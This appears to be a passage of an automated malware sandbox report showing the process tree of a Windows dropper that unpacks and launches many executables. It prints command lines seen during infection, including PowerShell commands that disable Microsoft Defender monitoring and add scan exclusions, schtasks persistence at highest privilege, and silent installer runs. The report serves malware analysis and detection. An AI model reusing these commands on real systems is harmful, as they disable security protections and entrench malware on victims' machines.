        C:\Users\Admin\AppData\Local\Temp\is-RBEG3.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RBEG3.tmp\DYbALA.exe" /S /UID=2710
        8⤵
        
        PID:5300
        
        C:\Program Files\VideoLAN\AWAAOKFFBP\foldershare.exe
        
        "C:\Program Files\VideoLAN\AWAAOKFFBP\foldershare.exe" /VERYSILENT
        9⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\af-780ea-aa0-7e888-c87884138c439\Meneputaema.exe
        
        "C:\Users\Admin\AppData\Local\Temp\af-780ea-aa0-7e888-c87884138c439\Meneputaema.exe"
        9⤵
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\e9-5445f-ca1-330b4-051baed75ebe0\Bakajuraexi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e9-5445f-ca1-330b4-051baed75ebe0\Bakajuraexi.exe"
        9⤵
        
        PID:2268
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ai3hpr05.xpn\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
        10⤵
        
        PID:6928
        
        C:\Users\Admin\AppData\Local\Temp\ai3hpr05.xpn\setting.exe
        
        C:\Users\Admin\AppData\Local\Temp\ai3hpr05.xpn\setting.exe SID=778 CID=778 SILENT=1 /quiet
        11⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ai3hpr05.xpn\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ai3hpr05.xpn\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634999608 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
        12⤵
        
        PID:8316
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rrocqiai.glb\GcleanerEU.exe /eufive & exit
        10⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\rrocqiai.glb\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\rrocqiai.glb\GcleanerEU.exe /eufive
        11⤵
        
        PID:5264
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fwrsnx20.4na\installer.exe /qn CAMPAIGN="654" & exit
        10⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\fwrsnx20.4na\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\fwrsnx20.4na\installer.exe /qn CAMPAIGN="654"
        11⤵
        
        PID:528
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fwrsnx20.4na\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fwrsnx20.4na\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634999608 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        12⤵
        
        PID:6756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vj1i4d2o.jwu\any.exe & exit
        10⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\vj1i4d2o.jwu\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\vj1i4d2o.jwu\any.exe
        11⤵
        
        PID:5304
        
        C:\Users\Admin\AppData\Local\Temp\vj1i4d2o.jwu\any.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vj1i4d2o.jwu\any.exe" -u
        12⤵
        
        PID:7332
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\glxxpznj.l5r\customer51.exe & exit
        10⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\glxxpznj.l5r\customer51.exe
        
        C:\Users\Admin\AppData\Local\Temp\glxxpznj.l5r\customer51.exe
        11⤵
        
        PID:828
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aglxrvoh.21y\gcleaner.exe /mixfive & exit
        10⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\aglxrvoh.21y\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\aglxrvoh.21y\gcleaner.exe /mixfive
        11⤵
        
        PID:7528
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t4eknwxa.xok\autosubplayer.exe /S & exit
        10⤵
        
        PID:7112
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wijw35xr.pqn\installer.exe /qn CAMPAIGN=654 & exit
        10⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\wijw35xr.pqn\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\wijw35xr.pqn\installer.exe /qn CAMPAIGN=654
        11⤵
        
        PID:8140
      - C:\Users\Admin\Pictures\Adobe Films\hkmTcK3PrQ15lanDkKNJcCs5.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\hkmTcK3PrQ15lanDkKNJcCs5.exe"
        6⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        7⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
        8⤵
        
        PID:9076
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d8,0x1d4,0x1d0,0x1fc,0x1cc,0x7ffc38b2dec0,0x7ffc38b2ded0,0x7ffc38b2dee0
        9⤵
        Executes dropped EXE
        
        PID:5868
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=1804 /prefetch:8
        9⤵
        
        PID:9200
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1752 /prefetch:2
        9⤵
        
        PID:9120
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=2224 /prefetch:8
        9⤵
        
        PID:8432
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2532 /prefetch:1
        9⤵
        
        PID:8488
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2500 /prefetch:1
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5264
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3268 /prefetch:2
        9⤵
        
        PID:8688
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=3608 /prefetch:8
        9⤵
        
        PID:5760
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=3580 /prefetch:8
        9⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=3380 /prefetch:8
        9⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=3012 /prefetch:8
        9⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1732,14534098043945788769,9241262585585422397,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9076_35041345" --mojo-platform-channel-handle=2924 /prefetch:8
        9⤵
        
        PID:7540
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe
      4⤵
      PID:4652
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat14b47e86b9c16b.exe
        
        Sat14b47e86b9c16b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4300
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:3152
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe
      4⤵
      PID:3204
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1427fbafcf251.exe
        
        Sat1427fbafcf251.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2712
      - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1427fbafcf251.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1427fbafcf251.exe
        6⤵
        Executes dropped EXE
        
        PID:2140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe
      4⤵
      PID:3272
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1481f5a7e3eccdd.exe
        
        Sat1481f5a7e3eccdd.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe
      4⤵
      PID:508
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat14a7594cc5a0116.exe
        
        Sat14a7594cc5a0116.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:4936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe
      4⤵
      PID:3052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe
      4⤵
      PID:828

C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat142ac5249376e895.exe
Sat142ac5249376e895.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4052

C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat144474a564d26f29.exe
Sat144474a564d26f29.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:2800
- C:\Users\Admin\Pictures\Adobe Films\Q__E9dnTTvzMRDObKFW3jYTq.exe
  "C:\Users\Admin\Pictures\Adobe Films\Q__E9dnTTvzMRDObKFW3jYTq.exe"
  2⤵
  - Executes dropped EXE
  PID:6088
- C:\Users\Admin\Pictures\Adobe Films\aXhWwRlFiTz_d9ZgGw_y44PI.exe
  "C:\Users\Admin\Pictures\Adobe Films\aXhWwRlFiTz_d9ZgGw_y44PI.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5476
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3580
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4704
- C:\Users\Admin\Pictures\Adobe Films\LXbF_ijD_rK8Rq2FCUMM0TH2.exe
  "C:\Users\Admin\Pictures\Adobe Films\LXbF_ijD_rK8Rq2FCUMM0TH2.exe"
  2⤵
  PID:1840
- C:\Users\Admin\Pictures\Adobe Films\BgKbBly8MYhyBVMR7YcPo8F2.exe
  "C:\Users\Admin\Pictures\Adobe Films\BgKbBly8MYhyBVMR7YcPo8F2.exe"
  2⤵
  - Executes dropped EXE
  PID:5796
- C:\Users\Admin\Pictures\Adobe Films\A5rF7e8bAs42GoFgu7_ou5fF.exe
  "C:\Users\Admin\Pictures\Adobe Films\A5rF7e8bAs42GoFgu7_ou5fF.exe"
  2⤵
  PID:916
- C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe
  "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe"
  2⤵
  PID:5280
- - C:\Users\Admin\AppData\Local\Temp\de08c26d-a06f-40e0-9052-cc5bf300f1f8\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\de08c26d-a06f-40e0-9052-cc5bf300f1f8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\de08c26d-a06f-40e0-9052-cc5bf300f1f8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\de08c26d-a06f-40e0-9052-cc5bf300f1f8\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\de08c26d-a06f-40e0-9052-cc5bf300f1f8\AdvancedRun.exe" /SpecialRun 4101d8 2292
      4⤵
      PID:4048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe" -Force
    3⤵
    PID:6828
- - C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe
    "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe"
    3⤵
    PID:4640
- - C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe
    "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe"
    3⤵
    PID:4064
- C:\Users\Admin\Pictures\Adobe Films\WQuUAdFOCSPEdIDEqe0ds0wl.exe
  "C:\Users\Admin\Pictures\Adobe Films\WQuUAdFOCSPEdIDEqe0ds0wl.exe"
  2⤵
  PID:5296
- C:\Users\Admin\Pictures\Adobe Films\nDno_1iE87SCARnlawV3Dllh.exe
  "C:\Users\Admin\Pictures\Adobe Films\nDno_1iE87SCARnlawV3Dllh.exe"
  2⤵
  PID:4704

C:\Users\Admin\AppData\Local\Temp\is-93IK1.tmp\Sat1481f5a7e3eccdd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-93IK1.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$30276,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1481f5a7e3eccdd.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1164
- C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1481f5a7e3eccdd.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1481f5a7e3eccdd.exe" /SILENT
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:680

C:\Users\Admin\AppData\Local\Temp\is-AA7KP.tmp\Sat1481f5a7e3eccdd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AA7KP.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$40202,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1481f5a7e3eccdd.exe" /SILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1184
- C:\Users\Admin\AppData\Local\Temp\is-8EUSK.tmp\postback.exe
  "C:\Users\Admin\AppData\Local\Temp\is-8EUSK.tmp\postback.exe" ss1
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2236

C:\Users\Admin\Desktop\setup_x86_x64_install.exe
"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2508
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  PID:5264
- - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS094ED586\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:5556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:5908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:5480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      PID:5900
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:2212
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe
      4⤵
      PID:6032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe
      4⤵
      PID:6048
    - - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat14a7594cc5a0116.exe
        
        Sat14a7594cc5a0116.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:6136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe
      4⤵
      PID:6040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe
      4⤵
      PID:6024
    - - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat14b47e86b9c16b.exe
        
        Sat14b47e86b9c16b.exe
        5⤵
        
        PID:5920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe
      4⤵
      PID:6016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe
      4⤵
      PID:6008
    - - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat1487ca754e680f91.exe
        
        Sat1487ca754e680f91.exe
        5⤵
        Executes dropped EXE
        
        PID:5884
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe
      4⤵
      PID:5996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone
      4⤵
      PID:5988
    - - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat14febbc433.exe
        
        Sat14febbc433.exe /mixone
        5⤵
        
        PID:5868
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 660
        6⤵
        Program crash
        
        PID:4368
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 676
        6⤵
        Program crash
        
        PID:2268
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 680
        6⤵
        Program crash
        
        PID:5424
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 676
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Program crash
        Suspicious use of SetWindowsHookEx
        
        PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe
      4⤵
      PID:5980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe
      4⤵
      PID:5964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe
      4⤵
      PID:5956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe
      4⤵
      PID:5948
    - - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat14f1396dfcf191bd.exe
        
        Sat14f1396dfcf191bd.exe
        5⤵
        Executes dropped EXE
        
        PID:5744
      - C:\Users\Admin\AppData\Roaming\4237427.exe
        
        "C:\Users\Admin\AppData\Roaming\4237427.exe"
        6⤵
        
        PID:3732
      - C:\Users\Admin\AppData\Roaming\6718151.exe
        
        "C:\Users\Admin\AppData\Roaming\6718151.exe"
        6⤵
        
        PID:5824
      - C:\Users\Admin\AppData\Roaming\5247908.exe
        
        "C:\Users\Admin\AppData\Roaming\5247908.exe"
        6⤵
        
        PID:1760
      - C:\Users\Admin\AppData\Roaming\3306436.exe
        
        "C:\Users\Admin\AppData\Roaming\3306436.exe"
        6⤵
        
        PID:1444
      - C:\Users\Admin\AppData\Roaming\1836194.exe
        
        "C:\Users\Admin\AppData\Roaming\1836194.exe"
        6⤵
        
        PID:6360

C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat14d32a38896785b13.exe
Sat14d32a38896785b13.exe
1⤵
- Executes dropped EXE
PID:6112
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 6112 -s 1536
  2⤵
  - Program crash
  PID:6504

C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat14514904a4b.exe
Sat14514904a4b.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2780

C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat1481f5a7e3eccdd.exe
Sat1481f5a7e3eccdd.exe
1⤵
PID:4368
- C:\Users\Admin\AppData\Local\Temp\is-H5B1K.tmp\Sat1481f5a7e3eccdd.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-H5B1K.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$40234,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat1481f5a7e3eccdd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  PID:5452
- - C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat1481f5a7e3eccdd.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat1481f5a7e3eccdd.exe" /SILENT
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\is-5CJ72.tmp\Sat1481f5a7e3eccdd.tmp
